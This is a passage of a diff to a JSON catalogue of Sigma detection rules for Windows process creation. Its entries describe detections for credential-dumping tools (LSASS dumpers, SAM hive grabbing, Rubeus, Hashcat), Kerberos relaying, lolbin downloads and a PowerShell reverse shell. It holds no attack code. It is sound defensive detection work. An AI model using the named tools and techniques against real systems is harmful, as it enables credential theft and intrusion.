shortcuts on the machine in order to find the original file to encrypt\n", + "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", "meta": { "author": "frack113", - "creation_date": "2022/03/02", + "creation_date": "2022/11/18", "falsepositive": [ - "Legitimate use" + "Unknown" ], - "filename": "proc_creation_win_fsutil_symlinkevaluation.yml", + "filename": "proc_creation_win_susp_powercfg.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", - "https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", - "value": "Fsutil Behavior Set SymlinkEvaluation" - }, - { - "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/10", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_get_localgroup_member_recon.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_get_localgroup_member_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.001" - ] - }, - "uuid": "c8a180d6-47a3-4345-a609-53f9c3d834fc", - "value": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet" - }, - { - "description": "Detects the execution GMER tool based on image and hash fields.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/05", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_gmer_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://www.gmer.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gmer_execution.yml" + "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options", + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powercfg.yml" ], "tags": [ "attack.defense_evasion" ] }, - "uuid": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", - "value": "GMER - Rootkit Detector and Remover Execution" + "uuid": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", + "value": "Suspicious Powercfg Execution To Change Lock Screen Timeout" }, { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "description": "Detects suspicious flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", "meta": { - "author": "frack113", - "creation_date": "2022/02/13", + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2021/11/23", "falsepositive": [ - "Legitimate use" + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "filename": "proc_creation_win_gotoopener.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gotoopener.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", - "value": "Use of GoToAssist Remote Access Software" - }, - { - "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", - "meta": { - "author": "Nasreddine Bencherchali, X__Junior", - "creation_date": "2022/11/30", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_gpg4win_susp_usage.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_susp_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", - "value": "Gpg4Win Decrypt Files From Suspicious Locations" - }, - { - "description": "Dump sam, system or security hives using REG.exe utility", - "meta": { - "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/22", - "falsepositive": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" - ], - "filename": "proc_creation_win_grabbing_sensitive_hives_via_reg.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", - "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_grabbing_sensitive_hives_via_reg.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" - ] - }, - "uuid": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "value": "Grabbing Sensitive Hives via Reg Utility" - }, - { - "description": "Detects the use of Windows hacktools based on their import hash (imphash) even if the files have been renamed", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/04", - "falsepositive": [ - "Legitimate use of one of these tools" - ], - "filename": "proc_creation_win_hacktool_imphashes.yml", + "filename": "proc_creation_win_susp_psexex_paexec_escalate_system.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml" - ], - "tags": "No established tags" - }, - "uuid": "24e3e58a-646b-4b50-adef-02ef935b9fc8", - "value": "Windows Hacktool Imphash" - }, - { - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/31", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_hack_adcspwn.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/bats3c/ADCSPwn", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml" + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.poweradmin.com/paexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml" ], "tags": [ - "attack.credential_access", - "attack.t1557.001" + "attack.resource_development", + "attack.t1587.001" ] }, - "uuid": "cd8c163e-a19b-402e-bdd5-419ff5859f12", - "value": "ADCSPwn Hack Tool" + "uuid": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "value": "PsExec/PAExec Escalation to LOCAL SYSTEM" }, { - "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", "meta": { "author": "Florian Roth", - "creation_date": "2019/12/20", + "creation_date": "2018/06/22", "falsepositive": [ - "Other programs that use these command line option and accepts an 'All' parameter" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "filename": "proc_creation_win_hack_bloodhound.yml", + "filename": "proc_creation_win_susp_sysprep_appdata.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", + "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", + "value": "Sysprep on AppData Folder" + }, + { + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/24", + "falsepositive": [ + "Other tools that work with encoded scripts in the command line instead of script files" + ], + "filename": "proc_creation_win_susp_powershell_cmd_patterns.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/BloodHoundAD/BloodHound", - "https://github.com/BloodHoundAD/SharpHound", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml" + "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml" ], "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", "attack.execution", "attack.t1059.001" ] }, - "uuid": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", - "value": "Bloodhound and Sharphound Hack Tool" + "uuid": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "value": "Suspicious PowerShell Encoded Command Patterns" }, { - "description": "Detects the use of tools created by a well-known hacktool producer named Cube0x0, which includes his handle in all binaries as company information in the PE headers (SharpPrintNightmare, KrbRelay, SharpMapExec etc.)", + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", "meta": { "author": "Florian Roth", - "creation_date": "2022/04/27", + "creation_date": "2020/07/03", "falsepositive": [ - "Unlikely" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "filename": "proc_creation_win_hack_cube0x0_tools.yml", + "filename": "proc_creation_win_susp_desktopimgdownldr.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/cube0x0", - "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml" - ], - "tags": "No established tags" - }, - "uuid": "37c1333a-a0db-48be-b64b-7393b2386e3b", - "value": "Hacktool by Cube0x0" - }, - { - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/02/04", - "falsepositive": [ - "Very unlikely" - ], - "filename": "proc_creation_win_hack_dumpert.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/outflanknl/Dumpert", - "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "2704ab9e-afe2-4854-a3b1-0c0706d03578", - "value": "Dumpert Process Dumper" - }, - { - "description": "Detects command line parameters used by Hydra password guessing hack tool", - "meta": { - "author": "Vasiliy Burov", - "creation_date": "2020/10/05", - "falsepositive": [ - "Software that uses the caret encased keywords PASS and USER in its command line" - ], - "filename": "proc_creation_win_hack_hydra.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/vanhauser-thc/thc-hydra", - "https://attack.mitre.org/techniques/T1110/001/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_hydra.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" - ] - }, - "uuid": "aaafa146-074c-11eb-adc1-0242ac120002", - "value": "Hydra Password Guessing Hack Tool" - }, - { - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/24", - "falsepositive": [ - "Very unlikely" - ], - "filename": "proc_creation_win_hack_inveigh.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Kevin-Robertson/Inveigh", - "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", - "value": "Inveigh Hack Tool" - }, - { - "description": "Detects command line parameters used by Koadic hack tool", - "meta": { - "author": "wagga, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2020/01/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_hack_koadic.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/", - "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js", - "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_koadic.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" - ] - }, - "uuid": "5cddf373-ef00-4112-ad72-960ac29bac34", - "value": "Koadic Execution" - }, - { - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/04/27", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_hack_krbrelay.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/cube0x0/KrbRelay", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ] - }, - "uuid": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", - "value": "KrbRelay Hack Tool" - }, - { - "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/04/26", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_hack_krbrelayup.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Dec0ne/KrbRelayUp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" - ] - }, - "uuid": "12827a56-61a4-476a-a9cb-f3068f191073", - "value": "KrbRelayUp Hack Tool" - }, - { - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/12/19", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_hack_rubeus.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/", - "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", - "https://github.com/GhostPack/Rubeus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" - ] - }, - "uuid": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "value": "Rubeus Hack Tool" - }, - { - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/20", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_hack_safetykatz.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/GhostPack/SafetyKatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_safetykatz.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "b1876533-4ed5-4a83-90f3-b8645840a413", - "value": "SafetyKatz Hack Tool" - }, - { - "description": "Detects the execution of SecurityXploded Tools", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/12/19", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_hack_secutyxploded.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://securityxploded.com/", - "https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555" - ] - }, - "uuid": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "value": "SecurityXploded Tool" - }, - { - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/09/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_hack_sharpersist.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", - "https://github.com/mandiant/SharPersist", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053" - ] - }, - "uuid": "26488ad0-f9fd-4536-876f-52fea846a2e4", - "value": "SharPersist Usage" - }, - { - "description": "Detects SharpLdapWhoami, a whoami alternative by asking the LDAP service on a domain controller", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/29", - "falsepositive": [ - "Programs that use the same command line flags" - ], - "filename": "proc_creation_win_hack_sharpldapwhoami.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/bugch3ck/SharpLdapWhoami", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpldapwhoami.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" - ] - }, - "uuid": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "value": "SharpLdapWhoami" - }, - { - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/12/04", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_hack_sysmoneop.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Wh04m1001/SysmonEoP", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sysmoneop.yml" - ], - "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" - ] - }, - "uuid": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", - "value": "SysmonEOP Hack Tool" - }, - { - "description": "Detects the use of Windows Credential Editor (WCE)", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/12/31", - "falsepositive": [ - "Another service that uses a single -s command line switch" - ], - "filename": "proc_creation_win_hack_wce.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.ampliasecurity.com/research/windows-credentials-editor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_wce.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" - ] - }, - "uuid": "7aa7009a-28b9-4344-8c1f-159489a390df", - "value": "Windows Credential Editor" - }, - { - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/18", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_handlekatz.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/codewhitesec/HandleKatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_handlekatz.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "ca621ba5-54ab-4035-9942-d378e6fcde3c", - "value": "HandleKatz LSASS Dumper Usage" - }, - { - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "meta": { - "author": "frack113", - "creation_date": "2021/12/27", - "falsepositive": [ - "Tools that accidentally use the same command line flags and values" - ], - "filename": "proc_creation_win_hashcat.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat", - "https://hashcat.net/wiki/doku.php?id=hashcat", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hashcat.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110.002" - ] - }, - "uuid": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", - "value": "Password Cracking with Hashcat" - }, - { - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", - "meta": { - "author": "Sreeman, Florian Roth", - "creation_date": "2022/01/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_headless_browser_file_download.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1478234484881436672?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_headless_browser_file_download.yml" + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", + "https://twitter.com/SBousseaden/status/1278977301745741825", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml" ], "tags": [ "attack.command_and_control", "attack.t1105" ] }, - "uuid": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", - "value": "File Download with Headless Browser" + "uuid": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", + "value": "Suspicious Desktopimgdownldr Command" }, { - "description": "Identifies usage of hh.exe executing recently modified .chm files.", + "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", - "creation_date": "2019/10/24", + "author": "frack113, manasmbellani", + "creation_date": "2022/02/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_wlrmdr.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", + "value": "Wlrmdr Lolbin Use as Launcher" + }, + { + "description": "Detects execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/12/05", "falsepositive": [ "Unlikely" ], - "filename": "proc_creation_win_hh_chm.yml", + "filename": "proc_creation_win_renamed_mavinject.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md", - "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm.yml" + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", + "https://github.com/SigmaHQ/sigma/issues/3742", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1218.001" - ] - }, - "uuid": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", - "value": "HH.exe Execution" - }, - { - "description": "Detects usage of hh.exe to execute/download remotely hosted .chm files.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/29", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_hh_chm_http.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", - "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.001" - ] - }, - "uuid": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", - "value": "HH.exe Remote CHM File Execution" - }, - { - "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", - "meta": { - "author": "Sreeman", - "creation_date": "2020/04/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_hiding_malware_in_fonts_folder.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hiding_malware_in_fonts_folder.yml" - ], - "tags": [ - "attack.t1211", - "attack.t1059", - "attack.defense_evasion", - "attack.persistence" - ] - }, - "uuid": "ae9b0bd7-8888-4606-b444-0ed7410cb728", - "value": "Writing Of Malicious Files To The Fonts Folder" - }, - { - "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_high_integrity_sdclt.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/6", - "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_high_integrity_sdclt.yml" - ], - "tags": [ "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.t1055.001", + "attack.t1218.013" ] }, - "uuid": "40f9af16-589d-4984-b78d-8c2aec023197", - "value": "High Integrity Sdclt Process" + "uuid": "e6474a1b-5390-49cd-ab41-8d88655f7394", + "value": "Rename Mavinject Execution" }, { - "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", + "description": "Detects the Nishang Invoke-PowerShellTcpOneLine reverse shell", + "meta": { + "author": "FPT.EagleEye, wagga", + "creation_date": "2021/03/03", + "falsepositive": [ + "Administrative might use this function for checking network connectivity" + ], + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", 